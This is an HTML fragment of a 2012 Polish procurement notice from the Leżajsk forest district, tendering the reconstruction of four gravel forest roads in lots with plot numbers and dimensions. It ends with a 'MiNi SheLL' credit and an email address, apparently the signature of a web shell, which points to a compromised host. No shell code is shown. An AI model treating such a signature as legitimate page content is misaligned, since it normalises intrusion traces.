	4)  w razie zaistnienia zdarzeń niezależnych od stron, po dacie zawarcia umowy, o charakterze działania siły wyższej (np. niesprzyjające warunki atmosferyczne uniemożliwiające prawidłowe wykonanie przedmiotu zamówienia), które uniemożliwiałyby terminowe wykonanie zobowiązań - strony zobowiązują się do wspólnego określenia nowego terminu realizacji przedmiotu zamówienia,
	5)  w związku z zaistnieniem okoliczności, których Zamawiający i wykonawca nie przewidzieli w chwili zawarcia umowy. Wskazane okoliczności nie mogą być wywołane przez Zamawiającego, jak i wykonawcę, ani przez nich zawinione i musza wywoływać ten skutek, iż, umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu umowy.
           6) wystąpią warunki atmosferyczne uniemożliwiające terminową realizację umowy,
	7)  wystąpi możliwość zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizacje, obniżających koszt ponoszony przez  Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krosno.lasy.gov.pl/lezajsk<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Leżajsk, ul. T.Michałka 37-300 Leżajsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2012 godzina 09:30, miejsce: Nadleśnictwo Leżajsk, ul. T. Michałka 48, 37-300 Leżajsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa drogi L nr 14/07 Kulno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja      m. Piskorowice, 
nr ewid. działek   1902, 1900, 1901, 1926, 1904, 1905, 1907, 1910, 1911, 
                                             1913, 1914, 1915, 1917, 1928, 1929, 1930, 1931, 1932,      
                                              1898, 1933, 1934.
obręb ewidencyjny    0030 - Piskorowice,
jednostka ewidencyjna     180804-2 Leżajsk

Dane charakteryzujące obiekt:
- długość        4840,00 m,
- szerokość pasa jezdnego    3,50 m
- szerokość poboczy     2 x 0,75 m

Zakres robót:
- profilowanie i zagęszczenie podłoża, wykonanie nawierzchni z kamienia tłuczonego,
- wykonanie rowów obustronnych z wyprofilowaniem dna i skarp, uzupełnienie i plantowanie poboczy.
Szczegółowy zakres robót wykazano w przedmiarze robót, stanowiącym załącznik nr 2a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa drogi  L nr 20/10 Sarzyna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja      m. Łętownia, 
nr ewid. działek     4692, 4685,
obręb ewidencyjny      0006 - Łętownia,
jednostka ewidencyjna    1808055-5 Nowa Sarzyna

Lokalizacja         m. Sarzyna, 
nr ewid. działek     5092, 5099, 5100, 5110, 5119, 5120, 5109,
obręb ewidencyjny      0003 - Sarzyna,
jednostka ewidencyjna     1808055-5 Nowa Sarzyna

Dane charakteryzujące obiekt:
- długość       2164,90 m,
- szerokość pasa jezdnego     3,50 m
- szerokość poboczy      2 x 0,75 m

Zakres robót:
- profilowanie i zagęszczenie podłoża, wykonanie nawierzchni z kamienia tłuczonego,
- wykonanie rowów obustronnych z wyprofilowaniem dna i skarp, uzupełnienie i plantowanie poboczy.
Szczegółowy zakres robót wykazano w przedmiarze robót, stanowiącym załącznik nr 2b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa drogi L nr 29/11 Zerwanka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja      m. Brzóza Królewska.
nr ewid. działek      6479, 6480, 6481, 6482, 6483, 6484, 6485, 6486, 6487, 6488.
obręb ewidencyjny        0032 - Brzóza Królewska,
jednostka ewidencyjna     180804-2 Leżajsk.

Dane charakteryzujące obiekt:
- długość     2276,80 m,
- szerokość pasa jezdnego    3,50 m
- szerokość poboczy    2 x 0,75 m

Zakres robót:
- profilowanie i zagęszczenie podłoża, wykonanie nawierzchni z kamienia tłuczonego,
- wykonanie rowów obustronnych z wyprofilowaniem dna i skarp, uzupełnienie i plantowanie poboczy.
Szczegółowy zakres robót wykazano w przedmiarze robót, stanowiącym załącznik nr 2c do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przebudowa drogi L nr 27/09 Marynin, Zerwanka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lokalizacja        m. Brzóza Królewska.
nr ewid. działek    6392, 6393, 6394, 6395, 6401, 6402, 6403, 6404, 6411, 6412, 6420, 6421, 6429, 6430.
obręb ewidencyjny       0032 - Brzóza Królewska,
jednostka ewidencyjna      180804-2 Leżajsk.

Dane charakteryzujące obiekt:
- długość     2942,00 m,
- szerokość pasa jezdnego     3,50 m
- szerokość poboczy   2 x 0,75 m

Zakres robót:
- profilowanie i zagęszczenie podłoża, wykonanie nawierzchni z kamienia tłuczonego,
- wykonanie rowów obustronnych z wyprofilowaniem dna i skarp, uzupełnienie i plantowanie poboczy.
Szczegółowy zakres robót wykazano w przedmiarze robót, stanowiącym załącznik nr 2d do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.26-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com